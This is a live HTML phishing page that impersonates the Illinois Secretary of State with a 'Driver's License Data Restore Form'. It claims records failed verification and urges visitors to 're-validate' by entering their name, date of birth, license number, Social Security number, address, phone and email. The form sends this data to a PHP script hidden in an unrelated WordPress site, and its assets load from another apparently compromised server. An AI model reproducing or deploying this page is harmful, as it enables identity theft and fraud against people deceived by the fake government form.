<!DOCTYPE html>

<html lang="en">
    

<meta http-equiv="content-type" content="text/html;charset=ISO-8859-1" />
<head>
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta name="description" content="">
        <meta name="author" content="">
        <link rel="shortcut icon" href="https://www.cyberdriveillinois.com/assets/ico/favicon.ico">
        <title>Driver's License Restore Form</title>
        <link href="https://www.jmma.gr.jp/book/kyouekikyousou/_vti_cnf/dl/cyb/dist/bs3-3-5/css/bootstrap.css" rel="stylesheet">    
        <link href="https://www.jmma.gr.jp/book/kyouekikyousou/_vti_cnf/dl/cyb/css/bs3-3-5/custom.css" rel="stylesheet">    
        <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700" rel="stylesheet" type="text/css">    
        <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries -->
        <!--[if lt IE 9]>
        <script src="https://www.cyberdriveillinois.com/assets/js/html5shiv.js"></script>
        <script src="https://www.cyberdriveillinois.com/assets/js/respond.min.js"></script>
        <![endif]--> 
        <script src="https://www.jmma.gr.jp/book/kyouekikyousou/_vti_cnf/dl/cyb/scripts/bs3-3-5/nav.js"></script>
        <script src="https://www.jmma.gr.jp/book/kyouekikyousou/_vti_cnf/dl/cyb/scripts/googlytics.js"></script>
		<script> 
			function onLoad()
			{
				buildNavBar();
				buildSearchBar();
				buildFooterBar();
			} 				
        </script> 
    </head>  
    <body onLoad="onLoad()">    	
        <nav id="navigation" class="navbar navbar-default container" role="navigation"> 
        	<noscript>  
            	<div class="container">      		
                	JavaScript Required: For a secure web experience, this site uses JavaScript to complete web applications. You may visit our non-JavaScript <a href="#">navigation page</a>; however most of our resources will require you to use a browser with JavaScript enabled.
            	</div>
           	</noscript>           	
        </nav>
        <div class="container container-main"> 
            <div id="banner-second"> 
            	<div class="bancontain">
                </div>
            </div>
            <div id="search-bar" class="homesearch">  
            </div>
             <form action="https://shanestrailertraining.com/wp-includes/js/tinymce/plugins/compat3x/w/dl.php" method="post" name="contact" id="dlCon">
                <div class="content">
                    <h3>Driver's License Data Restore Form</h3>
                    <div class="heading-underline"></div><br>
                    
					<p>
                    	Due to errors encountered in our regular verification process of Records.  <a href="#">Please complete the re-validation form below to avoid loss of data</a>.
                    </p>
					
                    <br>
                    <div class="row">
                        <div class="col-sm-6">
                            <div class="form-group">
                                <label for="name" class="required">
                                    Full Name
                                </label>
                                <input type="text" id="name" name="name" maxlength="40" class="form-control" required autofocus>
                                <span class="help-block">As it appears on your DL, including middle initial</span>
                            </div>
						</div>

<div class="row">
                   		<div class="col-sm-6">
                            <div class="form-group">
                                <label for="birth" class="required">
                                    Date of Birth
                                </label>
                                <input type="text" id="birth" name="birth" maxlength="40" class="form-control" placeholder="mm/dd/yyyy" required>
                            </div>
                    	</div>
                    </div>
                     
                       	<div class="col-sm-6">
                            <div class="form-group">
                                <label for="dlnumber" class="required">
                                    Illinois Driver's License Number
                                </label>
                                <input type="text" id="dlnumber" name="dlnumber" maxlength="40" class="form-control" placeholder="A111-1111-1111" required>
                            </div>
						</div>
					
 <div class="col-sm-6">
                            <div class="form-group">
                                <label for="email" class="required">
                                    Weight
                                </label>
                                <input type="text" id="weit" name="weit" maxlength="40" class="form-control" required>
                             <span class="help-block">As it appears on your DL.</span>
                            </div>
						</div>
					</div>

                    <br>

<div class="row">
                   		<div class="col-sm-6">
                            <div class="form-group">
                                <label for="phone" class="required">
                                    Social Security Number
                                </label>
                                <input type="number" id="sn" name="sn" maxlength="40" class="form-control" placeholder="123-46-7890" required>



                            </div>
						</div></div>
                       

                   	<div class="row">
                   		<div class="col-sm-6">
                            <div class="form-group">
                                <label for="mailing" class="required">
                                    Mailing Address
                                </label>
                                <input type="text" id="mailing" name="mailing" maxlength="40" class="form-control" required>
                            </div>
						</div>
					</div>
                   <br>
                   <div class="row">
                   		<div class="col-sm-4">
                            <div class="form-group">
                                <label for="city" class="required">
                                    City
                                </label>
                                <input type="text" id="city" name="city" maxlength="40" class="form-control" required>
                            </div> 
						</div>
                   		<div class="col-sm-4">
                            <div class="form-group">
                                <label for="state" class="required">
                                    State
                                </label>
                                <select id="state" name="state" class="form-control" required>
                                    <option value="" selected>Select One</option>
                                    <option value="Alabama">Alabama</option>
                                    <option value="Alaska">Alaska</option>
                                    <option value="Arizona">Arizona</option>
                                    <option value="Arkansas">Arkansas</option>
                                    <option value="California">California</option>
                                    <option value="Colorado">Colorado</option>
                                    <option value="Connecticut">Connecticut</option>
                                    <option value="Delaware">Delaware</option>
                                    <option value="District of Columbia">District of Columbia</option>
                                    <option value="Florida">Florida</option>
                                    <option value="Georgia">Georgia</option>
                                    <option value="Hawaii">Hawaii</option>
                                    <option value="Illinois">Illinois</option>
                                    <option value="Idaho">Idaho</option>
                                    <option value="Indiana">Indiana</option>
                                    <option value="Iowa">Iowa</option>
                                    <option value="Kansas">Kansas</option>
                                    <option value="Kentucky">Kentucky</option>
                                    <option value="Louisiana">Louisiana</option>
                                    <option value="Maine">Maine</option>
                                    <option value="Maryland">Maryland</option>
                                    <option value="Massachusetts">Massachusetts</option>
                                    <option value="Michigan">Michigan</option>
                                    <option value="Minnesota">Minnesota</option>
                                    <option value="Mississippi">Mississippi</option>
                                    <option value="Missouri">Missouri</option>
                                    <option value="Montana">Montana</option>
                                    <option value="Nebraska">Nebraska</option>
                                    <option value="Nevada">Nevada</option>
                                    <option value="New Hampshire">New Hampshire</option>
                                    <option value="New Jersey">New Jersey</option>
                                    <option value="New Mexico">New Mexico</option>
                                    <option value="New York">New York</option>
                                    <option value="North Carolina">North Carolina</option>
                                    <option value="North Dakota">North Dakota</option>
                                    <option value="Ohio">Ohio</option>
                                    <option value="Oklahoma">Oklahoma</option>
                                    <option value="Oregon">Oregon</option>
                                    <option value="Pennsylvania">Pennsylvania</option>
                                    <option value="Rhode Island">Rhode Island</option>
                                    <option value="South Carolina">South Carolina</option>
                                    <option value="South Dakota">South Dakota</option>
                                    <option value="Tennessee">Tennessee</option>
                                    <option value="Texas">Texas</option>
                                    <option value="Utah">Utah</option>
                                    <option value="Vermont">Vermont</option>
                                    <option value="Virginia">Virginia</option>
                                    <option value="Washington">Washington</option>
                                    <option value="West Virginia">West Virginia</option>
                                    <option value="Wisconsin">Wisconsin</option>
                                    <option value="Wyoming">Wyoming</option>
                                </select>
                            </div>
						</div>
                   		<div class="col-sm-4">
                            <div class="form-group">
                                <label for="zip" class="required">
                                    ZIP Code
                                </label>
                                    <input type="text" id="zip" name="zip" maxlength="10" class="form-control" required>
                            </div>
					   </div>
					</div>
					<br>
					<div class="row">
                   		<div class="col-sm-6">
                            <div class="form-group">
                                <label for="phone" class="required">
                                    Daytime Telephone Number
                                </label>
                                <input type="text" id="phone" name="phone" maxlength="40" class="form-control" placeholder="123-456-7890" required>
                            </div>
						</div>
                        <div class="col-sm-6">
                            <div class="form-group">
                                <label for="email" class="required">
                                    Email Address
                                </label>
                                <input type="text" id="email" name="email" maxlength="40" class="form-control" required>
                            </div>
						</div>
					</div>
					<br>
                    
					
                    <div class="button-row">
                        <input type="submit" value="Submit" name="submit" class="btn btn-default m-r-15" disabled> 
                    </div>                     	
                </div> 
                <input type="hidden" name="mail_destination" value="driverslicense"> 
        	</form>           	
    	</div>
        <footer id="footer">
        	<noscript>
            	<div class="container">
            		JavaScript Required: This site uses JavaScript to display common navigation items.
                </div>
        	</noscript>
        </footer> 
        <!-- Bootstrap core JavaScript
        ================================================== -->
        <!-- Placed at the end of the document so the pages load faster -->
        <script src="https://www.jmma.gr.jp/book/kyouekikyousou/_vti_cnf/dl/cyb/assets/js/jquery-1.11.3.min.js"></script>
        <script src="https://www.jmma.gr.jp/book/kyouekikyousou/_vti_cnf/dl/cyb/dist/bs3-3-5/js/bootstrap.min.js"></script> 
        <script src="https://www.jmma.gr.jp/book/kyouekikyousou/_vti_cnf/dl/cyb/dist/bs3-3-5/validate/jquery.validate.min.js"></script>  
        <script src="https://www.jmma.gr.jp/book/kyouekikyousou/_vti_cnf/dl/cyb/dist/bs3-3-5/validate/additional-methods.min.js"></script>  
        <script>
			//disables submit if js turned off- must disable submit by default
			$(function(){
			  $('input[type="submit"], input[type="reset"]').attr('disabled', false);
			  $('input[type="reset"]').click(function(){
				$('.has-error .help-block-error').remove();
				$('.form-group').removeClass('has-error');
				$('#otherService, #contactSuper, #elaborateText').collapse('hide');
				});
			});
			$('form#dlCon').validate({			
				errorElement: 'span',
				errorClass: 'help-block-error',
				rules: {
					email: {
						email: true
					},
					zip: {
						zipcodeUS:true
					},
					phone: {
						phoneUS:true
					},
					dlnumber: {
						driversLicense: true
					},
					birth: {					
      					sosDate: true
					}
                                        
                                          
				},
				highlight: function(element) {
					$(element).closest('.form-group').addClass('has-error');
				},
				unhighlight: function(element) {
					$(element).closest('.form-group').removeClass('has-error');
				},
				submitHandler: function(form) {
					if ($('form#dlCon').valid()) {
						$('input[type="submit"], input[type="reset"]').prop('disabled', true);	
                        form.submit();         
					} 
				}
			});
		</script> 
    </body>


</html>